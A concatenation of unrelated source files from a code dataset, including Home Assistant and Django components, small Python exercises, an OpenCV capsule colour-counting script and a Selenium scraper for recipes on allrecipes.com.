] | permissive | CodeathonURV/CodeathonURV2016_Raspi | b944d7546e55af18148f5e1001e133a5aeb997b5 | 4eecd7ea86e8845bd1d0f4d5c3747f5e61b0214e | refs/heads/master | 2021-01-18T12:17:55.387695 | 2016-02-14T15:43:04 | 2016-02-14T15:43:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | from __future__ import unicode_literals
from django.apps import AppConfig
class SupervisionConfig(AppConfig):
name = 'supervision'
| [
"[email protected]"
] | |
cb91ae92c3397a0cba27896e52806faee64dc228 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /homeassistant/components/moehlenhoff_alpha2/binary_sensor.py | ddd92c3a70b2e0dd303e31693cb0d6f19d25c601 | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 2,029 | py | """Support for Alpha2 IO device battery sensors."""
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from . import Alpha2BaseCoordinator
from .const import DOMAIN
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Add Alpha2 sensor entities from a config_entry."""
coordinator: Alpha2BaseCoordinator = hass.data[DOMAIN][config_entry.entry_id]
async_add_entities(
Alpha2IODeviceBatterySensor(coordinator, io_device_id)
for io_device_id, io_device in coordinator.data["io_devices"].items()
if io_device["_HEATAREA_ID"]
)
class Alpha2IODeviceBatterySensor(
CoordinatorEntity[Alpha2BaseCoordinator], BinarySensorEntity
):
"""Alpha2 IO device battery binary sensor."""
_attr_device_class = BinarySensorDeviceClass.BATTERY
_attr_entity_category = EntityCategory.DIAGNOSTIC
def __init__(self, coordinator: Alpha2BaseCoordinator, io_device_id: str) -> None:
"""Initialize Alpha2IODeviceBatterySensor."""
super().__init__(coordinator)
self.io_device_id = io_device_id
self._attr_unique_id = f"{io_device_id}:battery"
io_device = self.coordinator.data["io_devices"][io_device_id]
heat_area = self.coordinator.data["heat_areas"][io_device["_HEATAREA_ID"]]
self._attr_name = (
f"{heat_area['HEATAREA_NAME']} IO device {io_device['NR']} battery"
)
@property
def is_on(self):
"""Return the state of the sensor."""
# 0=empty, 1=weak, 2=good
return self.coordinator.data["io_devices"][self.io_device_id]["BATTERY"] < 2
| [
"[email protected]"
] | |
73fc658fab6493e02d2e855c1be858adfa5c027a | 173016e62bcca69fc36b7888c1784ad599756ed5 | /special-number.py | 052c75cc895d21debe53294ffab805775e2d8a4e | [] | no_license | dogac00/Python-Problems | c9415a1e3f8fbf5418088bfe94564e3e4d6b388e | 057674477cd3c8fc2de550bb512eeb8ab5edba2e | refs/heads/master | 2020-03-18T00:28:39.154471 | 2019-07-11T20:48:29 | 2019-07-11T20:48:29 | 134,096,575 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | # A number is a Special Number if it’s digits only consist 0, 1, 2, 3, 4 or 5.
# Given a number determine if it special number or not.
special = set("012345")
def special_number(number):
return "Special!!" if set(str(number)) <= special else "NOT!!"
| [
"[email protected]"
] | |
ecb35b2b5b2cc20842256f8d6e32bd90ac048300 | 0ebf0f176b41aa3980ace85f1249f196f71d22d6 | /shoppingly/settings.py | 71cca9af8a965de2a61015c4dc4259fdfcf21b4c | [] | no_license | daps07/dookhim | 8f9c155e64416323cda698c7f5e9060638e33e72 | 3637651ffd20fd9440ff3dbe044d946d948a54d7 | refs/heads/master | 2023-07-16T06:46:16.235730 | 2021-08-26T04:57:59 | 2021-08-26T04:57:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,606 | py | """
Django settings for shoppingly project.
Generated by 'django-admin startproject' using Django 3.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
import django_heroku
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-e*nh=lwh^k5*9%$=67#fo$g%r6rfsehns&oomdzee9)!y^jtky'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'shoppingly.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'shoppingly.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR / 'media'
LOGIN_REDIRECT_URL = '/profile/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# Activate Django-Heroku.
django_heroku.settings(locals())
| [
"[email protected]"
] | |
c90971e822880fb2fb37f91db15ca2a3e3469a1c | 7a7c0cd1b38a306e7d51a67f6442fc0b48ae83a0 | /Exam/32.py | 8866719e4820db9cd84c8c34e69467ed23826fb6 | [] | no_license | 09-03/Infa | f06fd007ded30101b289730ef0ea12154e3f7317 | a7896461435650a6d3865047ed09ec9dadd4b493 | refs/heads/master | 2023-06-10T16:48:06.440654 | 2021-06-29T00:43:27 | 2021-06-29T00:43:27 | 297,751,033 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | """
Реализовать программу, реализующую действия со списками: добавление и удаление
элементов, упорядочивание, определение длины списка, вставку элемента, определение
индекса и др.
"""
def add(list,element):
list.append(element)
return print(f"Список после добавления элемента {element}: {list}")
def delete(list,element):
list.remove(element)
return print(f"Список после удаления элемента {element}: {list}")
def bubbleSort(list):
for i in range(len(list)-1):
for j in range(0, len(list)-i-1):
if list[j] > list[j+1] :
list[j], list[j+1] = list[j+1], list[j]
return print(f"Сортированный список: {list}")
def lenth(list):
return print(f"Длина списка: {len(list)}")
def insert(list, element):
index = int(input("Введите индекс вставки: "))
list.insert(index, element)
return print(f"Список после вставки элемента: {list}")
def find_index(list, element):
return print(f"Элемент {element} имеет индекс: {list.index(element)}")
massive = [25 ,-6, 6, 6, 0, 11, 20, 1]
add(massive.copy(), "a")
delete(massive.copy(), 0)
bubbleSort(massive.copy())
lenth(massive.copy())
insert(massive.copy(), "b")
find_index(massive.copy(), -6)
| [
"[email protected]"
] | |
768ebcd4aa20e78c05d5254425ac413fdac7a839 | 0cb8a6b9789e5304c3f25263d2844ac8527f7314 | /exporter/lib/constants.py | 41d677407cbd92c3d35ce85d6232665e0ae1757e | [
"MIT"
] | permissive | fossabot/crypto-exporter | bc1e2a133fcf7bd3d9b9d1c6ff673a7ca18ef900 | 2f83e478aaed06f7077ff777bc1c6373220f8535 | refs/heads/master | 2021-01-08T10:40:48.977894 | 2020-02-20T22:44:40 | 2020-02-20T22:44:40 | 242,006,322 | 0 | 0 | MIT | 2020-02-20T22:44:40 | 2020-02-20T22:44:39 | null | UTF-8 | Python | false | false | 253 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Constants declarations """
WARN_TICKER_SLOW_LOAD = 'Exchange doesn\'t support fetching all the tickers in one go. Loading them individually.'
# These get set at build time
VERSION = None
BUILD = None
| [
"[email protected]"
] | |
3abacad4b1fea836f4f8aa72c5adec65edcd4d41 | 725ed24c59988dc379df3c67503fad8a6ae65db2 | /code/03/ex070.py | 29e0fcbd10c69b315aea9268e447eafff575b0d8 | [] | no_license | oleg7521/Althoff_1 | 587990cfdca98f7dd8df029addc0df940d7556c7 | 8496ec9f2078af13ae9f7fd5783da89492590ac7 | refs/heads/master | 2020-05-21T11:38:38.228038 | 2019-05-10T18:09:13 | 2019-05-10T18:09:13 | 186,033,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | x = 10
y = 11
if x == 10:
if y == 11:
print(x + y)
| [
"[email protected]"
] | |
019b88ab66515b1fba73c088c4c4378affc6f9d1 | b48b5334c49552176616c7bcc0d55ce2d13e476e | /bigo/day-11-floyd-warshall/risk.py | 4a86303b90f93d4870faa5efc2b01b9938781bf6 | [] | no_license | huyngopt1994/python-Algorithm | 75ff16e01aa9e227690e639a9b9bcd997f374c6b | 13b10f9e99af74a6a096623e9094f89701bbb1b6 | refs/heads/master | 2021-07-13T01:03:56.919559 | 2020-06-01T02:49:32 | 2020-06-01T02:49:32 | 136,141,405 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | # https://uva.onlinejudge.org/index.php?Itemid=8&option=com_onlinejudge&page=show_problem&problem=508
if __name__ == '__main__':
for _ in range(19):
custom_input = input()
| [
"[email protected]"
] | |
ab57fa7710ac29fb77ef57c4c4e1a95d1adb1b50 | 9c6608e9906c6cb710ae4714268bc7c13f46cb88 | /common/common.py | d18b7dacd4cb0746fe022b671e5978664dd8df3d | [] | no_license | vpluzhnikov/anywhere | a5715fbc95d88ce126437461a42210b57c6db691 | c2c5d6644695a9c0c1b236d87de582a590effdfb | refs/heads/master | 2020-03-08T16:05:15.546578 | 2018-04-06T08:44:52 | 2018-04-06T08:44:52 | 128,230,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | import logging
import json
LOGFILENAME = 'anywhere.log'
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename=LOGFILENAME,
filemode='w')
logger = logging.getLogger(__name__)
def load_config(configfile):
with open(configfile) as json_conf_file:
config = json.load(json_conf_file)
return config | [
"[email protected]"
] | |
8162335c1dd204110849637430097ff8bf123131 | ae7c6f13c9875aa3bd0a2e481ff26e2839db5399 | /video_test_count_crop.py | 6b6e4b51aca3f7f230e3dd614e54603643a58fec | [] | no_license | SEAI-SEPCAP/Classification | f3c813e094d5e61253d08af9b753556d6097683a | 2feb325e4e5294824643b5d360bf3f80e989261f | refs/heads/main | 2023-02-08T05:43:04.178393 | 2020-12-04T23:46:52 | 2020-12-04T23:46:52 | 314,586,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,512 | py | import numpy as np
import cv2 as cv
flag = 0
old_flag = 1
capsule_count = 0
def click(event, x, y, flags, param):
if event == cv.EVENT_LBUTTONDOWN:
print(frame[y,x])
print(y)
def nothing(x):
pass
def area(w, h):
return w * h
def color_in_frame(image):
colors_detected = []
area_list = []
boundaries = [
([80,80,220],[110,110,255], 'red'),
([90,120,50],[120,160,110], 'dark green'),
([185,200,160],[210,220,180], 'light green'),
([220,220,220],[255,255,255], 'white'),
([100,210,230],[130,230,255], 'nude'),
([50,200,220],[80,240,255], 'yellow'),
([100,170,220],[130,210,255], 'orange')
]
mask = cv.inRange(image, np.array([0,0,0]) , np.array([85,85,85]))
mask = (255 - mask)
rect = thresh_callback(image, mask, 100)
if len(rect) == 1 and area(rect[0][2],rect[0][3]) > 6000:
crop = image[rect[0][1]:rect[0][1] + rect[0][3], rect[0][0]:rect[0][0] + rect[0][2]]
cv.imshow("crop", crop)
for (lower,upper, color) in boundaries:
lower = np.array(lower, dtype = 'uint8')
upper = np.array(upper, dtype= 'uint8')
if cv.inRange(crop, lower, upper).any():
colors_detected.append(color)
#print(colors_detected)
else:
colors_detected = []
#area_list.append(area(v[2],values[3]))
#print("Area sum: ",sum(area_list))
#print(colors_detected)
#if sum(area_list) > 5000:
#print("Colors Detected: ", colors_detected)
#print(sum(area_list))
return colors_detected
##output = cv.bitwise_and(image, image, mask=mask)
##else:
## print("Color not detected" + color)
#if 'output' in vars():
# cv.imshow("image",np.hstack([image,output]))
def thresh_callback(image, gray_image, val):
threshold = val
#canny_output = cv.Canny(gray_image, threshold, threshold * 2)
#cv.imshow("Canny", gray_image)
contours, _ = cv.findContours(gray_image, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)
contours_poly = [None] * len(contours)
boundRect = [None] * len(contours)
finalRect = []
## boundingRect returns x, y, w, h -> w is width and h is height
## Rect area equals w*h
## if len boundRect = 1 and area is bigger than a certain limit, check colors in frame ( or middle of rect) and return
## if len boundRect = 2 and both area is bigger than a certain limit, check colors in frame (or middle of rect) and return
for i, c in enumerate(contours):
contours_poly[i] = cv.approxPolyDP(c,3,True)
boundRect[i] = cv.boundingRect(contours_poly[i])
for i, values in enumerate(boundRect):
# print(area(boundRect[i][2], boundRect[i][3]))
if area(boundRect[i][2], boundRect[i][3]) > 2000:
finalRect.append(boundRect[i])
#print(finalRect)
final_img = image
for i in range(0,len(finalRect)):
color = (0,255,255)
color_rect = (0, 255, 0)
#cv.drawContours(drawing, contours_poly, i, color)
#cv.rectangle(drawing, (int(boundRect[i][0]), int(boundRect[i][1])), \
# (int(boundRect[i][0]+boundRect[i][2]), int(boundRect[i][1]+boundRect[i][3])), color_rect, 2)
#if 140 < (finalRect[i][1]+finalRect[i][3]/2) < 350:
cv.rectangle(final_img, (int(finalRect[i][0]), int(finalRect[i][1])), \
(int(finalRect[i][0]+finalRect[i][2]), int(finalRect[i][1]+finalRect[i][3])), color_rect, 2)
#cv.putText(final_img,'White', (60,120),cv.FONT_HERSHEY_PLAIN,0.8, (255,255,255), 1)
#cv.putText(final_img,'Red', (120,120),cv.FONT_HERSHEY_PLAIN,0.8, (0,0,255), 1)
#cv.imshow('Contours', drawing)
cv.imshow('Square image', final_img)
return finalRect
##MAIN
cap = cv.VideoCapture("videos\\video_4s.mp4")
cv.namedWindow("Trackbars",)
cv.createTrackbar("lb","Trackbars",0,255,nothing)
cv.createTrackbar("lg","Trackbars",0,255,nothing)
cv.createTrackbar("lr","Trackbars",0,255,nothing)
cv.createTrackbar("ub","Trackbars",255,255,nothing)
cv.createTrackbar("ug","Trackbars",255,255,nothing)
cv.createTrackbar("ur","Trackbars",255,255,nothing)
while(cap.isOpened()):
e1 = cv.getTickCount()
ret, frame = cap.read()
if not ret:
break
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
gray = cv.blur(gray, (3,3))
#frame = cv.blur(frame, (3,3))
#frame = cv.bilateralFilter(frame, 45, 75, 75)
frame = cv.medianBlur(frame,9)
#height, width = frame.shape[:2]
#frame = cv.resize(frame,(width/5, height/5), interpolation = cv.INTER_CUBIC)
#hsv = cv.cvtColor(frame,cv.COLOR_BGR2HSV)
#cv.imshow("hsv", hsv)
lb = cv.getTrackbarPos("lb","Trackbars")
lg = cv.getTrackbarPos("lg","Trackbars")
lr = cv.getTrackbarPos("lr","Trackbars")
ub = cv.getTrackbarPos("ub","Trackbars")
ug = cv.getTrackbarPos("ug","Trackbars")
ur = cv.getTrackbarPos("ur","Trackbars")
l_blue = np.array([lb,lg,lr])
u_blue = np.array([ub,ug,ur])
mask = cv.inRange(frame, l_blue, u_blue)
result = cv.bitwise_and(frame,frame,mask=mask)
#cv.imshow('frame', frame)
thresh = 100
#thresh_callback(frame, cv.cvtColor(result, cv.COLOR_BGR2GRAY), thresh)
colors = color_in_frame(frame)
#print("Flag before: ",flag)
#print(colors)
if (colors != [] and flag == 0) and old_flag == 1:
old_flag = flag
flag = 1
print("Capsule detected: ", colors)
capsule_count = capsule_count + 1
elif (colors == [] and flag == 1) and old_flag == 0:
old_flag = flag
flag = 0
print("Capsule not in frame")
#print("Flag: ", flag)
#print("Old Flag: ", old_flag)
cv.imshow("frame", frame)
cv.setMouseCallback("frame", click)
#cv.imshow("mask", mask)
#cv.imshow("result",result)
if cv.waitKey(1) == ord('q'):
break
e2 = cv.getTickCount()
time = (e2 - e1) / cv.getTickFrequency()
print(time)
print("Total capsules: ", capsule_count)
cap.release()
cv.destroyAllWindows()
| [
"[email protected]"
] | |
7e2b777cfb3f7c9a50c6bf7b30d0dddd2f52c364 | ab9aae2cbe16502e52c6a728a68e1f0ea3e8b8d0 | /mysite/urls.py | 88dc1bfdbeacdca983c2c354bb1afc79d410d3cf | [] | no_license | leftcoastbeard/djangotest | e9e7f53581d47f467225ab86f9f262fed628d3de | 938c523c1cd8c684bd2dbd8760827ea6213d4a1b | refs/heads/master | 2021-04-09T11:52:02.892976 | 2018-03-28T17:42:00 | 2018-03-28T17:42:00 | 125,576,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
# path('polls/', include('polls.urls', namespace="polls")),
path('polls/', include('polls.urls')),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
e068501920dd3f8e922106ad3892c04f9f024937 | 0ecebfeb8dda622fc2cecf896ee36e1fa02377e0 | /day2/s1/search/src/aliyun-opensearch-python-sdk-master/opensearch/__init__.py | 916274eea16288321b075449ca3a5127a969cecf | [] | no_license | jianchangfeng/RecommentSystem | 06a2473e4770b875402800969c0dcef56e0e7ab5 | 44bff601830667a46d96ea8d8e976dd3d792f4d5 | refs/heads/master | 2020-06-16T07:54:39.223628 | 2019-09-27T13:32:56 | 2019-09-27T13:32:56 | 195,517,034 | 1 | 0 | null | 2020-03-16T21:32:21 | 2019-07-06T08:35:23 | TSQL | UTF-8 | Python | false | false | 191 | py | from . import const
from .client import Client
from .app import IndexApp
from .document import IndexDoc
from .search import Search
from .suggest import Suggest
from .errorlog import ErrorLog
| [
"[email protected]"
] | |
b747250572a94ec53e231cbc946c58362081b1c1 | 586f064a78f5fb5d191ded4a6b9e5c01d0216abf | /source/pybass/tests/test_flac_win.py | aa3266e49ff4123b994a60821531e3da41a77e91 | [
"MIT"
] | permissive | peppy0510/PyMusicPlayer | b114e01702d0d709d5fdb072aa2b35012fc2bcd4 | b63801283fee774f3d33ef3e54aeaa9e8147be18 | refs/heads/master | 2023-06-29T03:12:28.093206 | 2023-06-19T02:38:41 | 2023-06-19T02:38:41 | 177,516,389 | 25 | 6 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | # -*- coding: utf-8 -*-
# Copyright(c) Wasylews 2013 ([email protected])
from pybass import BASS_Free
from pybass import BASS_Init
from pybass import BASS_PluginLoad
from pybass import BASS_StreamCreateFile
from pybass import play_handle
def main():
BASS_Init(-1, 44100, 0, 0, 0)
plugin = BASS_PluginLoad(b'bass_flac.dll', 0)
print('plugin = %d' % plugin)
handle = BASS_StreamCreateFile(False, b'test.flac', 0, 0, 0)
play_handle(handle, show_tags=False)
BASS_Free()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
de225fcb243c2a0f60999ef44906408c12a0d636 | b6377fda02fd483cfb760983d48274a9f28a9c3a | /src/recipes/recipe_scraper.py | 271db63313c81a064f4577c0c2119877d85ce024 | [] | no_license | nykznykz/CourseProject | 8ebb18de771c679d9c3961c1ca0e36d526909019 | 6db546e2c10a23de12bc24b452c2e759b19ae6ea | refs/heads/main | 2023-01-30T01:51:16.100598 | 2020-12-13T20:46:42 | 2020-12-13T20:46:42 | 307,244,102 | 0 | 1 | null | 2020-12-13T12:22:41 | 2020-10-26T02:43:18 | Python | UTF-8 | Python | false | false | 21,380 | py |
import csv
import json
import multiprocessing
import pandas
import re
import sys
import time
import unicodedata
import urllib
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
import os.path
from os import path
# Constants
RECIPE_CSV_FIELDNAMES = ['id', 'url', 'title', 'summary', 'category', 'breadcrumb', 'rating_average',
'rating_count', 'rating_detail', 'info', 'ingredients', 'directions', 'notes',
'nutrition', 'main_image', 'ugc_image']
RESULT_CSV_PATH = '../data/recipes.csv'
def is_valid_recipe_url(url):
"""Check whether the given url is a valid recipe url.
Args:
url: Url to check.
Returns:
True if the given url is a valid recipe url.
"""
return url.startswith('https://www.allrecipes.com/recipe')
def clean_url(url):
"""Clean the given url into the expected format of a recipe url. Invalid url will be marked as None.
Args:
url: Url to clean.
Returns:
Recipe url with the expected format (e.g., 'https://www.allrecipes.com/recipe/99970/chicken-cotija/').
Invalid url is returned as None instead.
"""
url = url.split('?')[0]
root_url = 'https://www.allrecipes.com'
if not url.startswith(root_url):
url = root_url + url
if not is_valid_recipe_url:
return None
return url
def recipe_id_from_recipe_url(url):
"""Key function for sorting recipe urls. The sort will be done by the recipe id.
Args:
url: A recipe url (e.g., 'https://www.allrecipes.com/recipe/99970/chicken-cotija/')
Returns:
The key for list sort function, which is the recipe id found in the given url.
"""
return int(url.split('/')[4])
def recipe_cache_path(batch_id):
"""Recipe cache path with the given batch id.
Args:
batch_id: Batch ID assigned to the process which generated the recipe cache.
Returns:
Path for the recipe cache.
"""
return 'cache/recipe_scrape_{}_cache.csv'.format(batch_id)
def clean_url_list(urls, should_clean_url=False):
"""Clean the given list of urls: remove invalid urls, redundant urls, and sort them in lexicographic order.
Args:
urls: List of url
should_clean_url: If True, the function will iterate through every url and clean the url if necessary.
Returns:
Sorted list of unique recipe urls.
"""
if should_clean_url:
new_urls = []
for i in range(0,len(urls)):
url = clean_url(urls[i])
if url != None:
new_urls.append(url)
urls = new_urls
urls = list(set(urls))
urls.sort(key=recipe_id_from_recipe_url)
return urls
def category_name_from_category_root_url(category_root_url):
"""Category name from the given root URL of the category.
Args:
category_root_url: Root URL of the category.
Returns:
Category name.
"""
return category_root_url.rsplit("/",2)[1]
def clean_text(text):
""" Replace all fractional non-ascii characters.
Args:
text: Text to clean.
Returns:
Cleaned text with fractional unicode replaced, has non-ascii characters replaced, and has unnecessary whitespace removed.
"""
for char in '¼½¾⅐⅑⅒⅓⅔⅕⅖⅗⅘⅙⅚⅛⅜⅝⅞↉':
normalized = unicodedata.normalize('NFKC',char)
text.replace(char, normalized)
text = text.encode('ascii',errors='ignore').decode('utf-8') # Remove non-ascii characters.
text = re.sub('\s+',' ',text) # Replace repeated whitespaces with a single space.
text = text.strip() # Clean unnecessary leading or trailing whitespaces.
return text
def scrape_root_url(root_url):
"""Scrape the root url to get category root urls. The main carousel nav is the source of category root urls.
Args:
root_url: Root url of the site to scrape.
Returns:
A list of category urls.
"""
options = Options()
options.headless = True
driver = webdriver.Chrome('./chromedriver',options=options)
category_root_urls = []
try:
cache_path = 'cache/category_root_urls_cache.json'
if path.exists(cache_path):
with open(cache_path, 'r') as json_file:
category_root_urls = json.load(json_file)
else:
driver.get(root_url)
soup = BeautifulSoup(driver.execute_script('return document.body.innerHTML'),'html.parser')
for link_holder in soup.find_all(class_='carouselNav__link recipeCarousel__link'):
url = link_holder['href']
category_root_urls.append(url)
with open(cache_path, 'w') as json_file:
json.dump(category_root_urls, json_file)
finally:
driver.close()
driver.quit()
print('Number of category found: ', len(category_root_urls))
return category_root_urls
def scrape_single_category_root_url(category_root_url, driver):
"""Scrape the given category root url for a list of recipe urls.
Args:
category_root_url: Category root url to scrape.
driver: Selenium chrome driver used for scraping.
Returns:
A list of recipe urls scraped from the category root url.
"""
json_data = {}
category_name = category_name_from_category_root_url(category_root_url)
cache_path = 'cache/' + category_name + '_cache.json'
if path.exists(cache_path):
with open(cache_path, 'r') as json_file:
json_data = json.load(json_file)
else:
json_data = {
'category_name': category_name,
'category_url': category_root_url,
'last_page': 0,
'recipe_urls_length': 0,
'recipe_urls': [],
'timestamp': 0,
}
urls = clean_url_list(urls=json_data['recipe_urls'], should_clean_url=True)
print('Category: ', category_name, '. Number of recipe found: ', len(urls))
page_index = json_data['last_page']+1
while True:
page_url = category_root_url + '?page=' + str(page_index)
print('Looking at', page_url, '...')
driver.get(page_url)
time.sleep(0.25)
soup = BeautifulSoup(driver.execute_script('return document.body.innerHTML'),'html.parser')
is_new_recipe_found = False
for link_holder in [container.find(class_='card__titleLink') for container in soup.find_all(class_='card__detailsContainer')]:
url = clean_url(link_holder['href'])
if url != None:
urls.append(url)
is_new_recipe_found = True
for link_holder in [container.find(class_='tout__titleLink') for container in soup.find_all(class_='component tout')]:
url = clean_url(link_holder['href'])
if url != None:
urls.append(url)
is_new_recipe_found = True
for link_holder in [container.find(class_='fixed-recipe-card__title-link') for container in soup.find_all(class_='fixed-recipe-card')]:
url = clean_url(link_holder['href'])
if url != None:
urls.append(url)
is_new_recipe_found = True
if not is_new_recipe_found:
break
json_data['last_page'] = page_index
print('Category: ', category_name, '. Number of recipe found: ', len(urls))
# Save data per 100 page indices.
if page_index % 100 == 0:
urls = clean_url_list(urls=json_data['recipe_urls'])
json_data['recipe_urls'] = urls
json_data['recipe_urls_length'] = len(urls)
json_data['timestamp'] = time.time()
with open(cache_path, 'w') as json_file:
json.dump(json_data, json_file)
page_index += 1
urls = clean_url_list(urls=json_data['recipe_urls'])
json_data['recipe_urls'] = urls
json_data['recipe_urls_length'] = len(urls)
json_data['timestamp'] = time.time()
with open(cache_path, 'w') as json_file:
json.dump(json_data, json_file)
return json_data['recipe_urls']
def scrape_category_root_urls(category_root_urls):
"""Scrape the given list of root urls.
Args:
category_root_urls: List of category root urls to scrape.
Returns:
True if the scraping has been completed for all categories.
"""
options = Options()
options.headless = True
driver = webdriver.Chrome('./chromedriver',options=options)
try:
for category_root_url in category_root_urls:
scrape_single_category_root_url(category_root_url, driver)
finally:
driver.close()
driver.quit()
return True
def process_category_root_urls_in_parallel(category_root_urls, num_of_process=5):
"""Process the given list of root urls in parallel using a simple multiprocessing where each process is responsible for processing the same number of categories.
Args:
category_root_urls: List of category root url to scrape.
num_of_process: Number of process that invoked at the same time for multi-processing. Defaults to 5.
Returns:
True if all the processes have finished running.
"""
start_time = time.perf_counter()
categories_len = len(category_root_urls)
num_of_category_per_process = categories_len / num_of_process
processes = []
for i in range(num_of_process):
start_index = int(i * num_of_category_per_process)
end_index = int((i+1) * num_of_category_per_process)
process = multiprocessing.Process(target=scrape_category_root_urls, args=[category_root_urls[start_index:end_index]])
process.start()
processes.append(process)
for process in processes:
process.join()
finish_time = time.perf_counter()
print('Done scraping', categories_len, 'categories in ', round(finish_time-start_time, 2), 'second(s).')
return True
def coalesce_recipe_sources_from_category_cache(category_root_urls):
"""Combine all found urls from each category root urls.
Args:
category_root_urls: List of category root url that has been scraped.
Returns:
List of recipe urls in json format where key 'url' contains the url, and key 'categories' contains the category names associated with the url.
"""
recipe_source_dict = dict()
for category_root_url in category_root_urls:
category_name = category_name_from_category_root_url(category_root_url)
cache_path = 'cache/' + category_name + '_cache.json'
if path.exists(cache_path):
with open(cache_path, 'r') as json_file:
category_json_data = json.load(json_file)
for url in category_json_data['recipe_urls']:
if url in recipe_source_dict:
recipe_source_dict[url].append(category_json_data['category_name'])
else:
recipe_source_dict[url] = [category_json_data['category_name']]
combined_recipe_sources = []
for url, categories in recipe_source_dict.items():
combined_recipe_sources.append({
'url': url,
'categories': categories,
})
combined_recipe_sources_json = {
'recipe_sources_len': len(combined_recipe_sources),
'recipe_sources': combined_recipe_sources,
}
with open('cache/combined_recipe_urls_cache.json', 'w') as json_file:
json.dump(combined_recipe_sources_json, json_file)
return combined_recipe_sources
def scrape_single_recipe_url(recipe_url, recipe_category, driver):
"""Scrape recipe contents from a single recipe url.
Args:
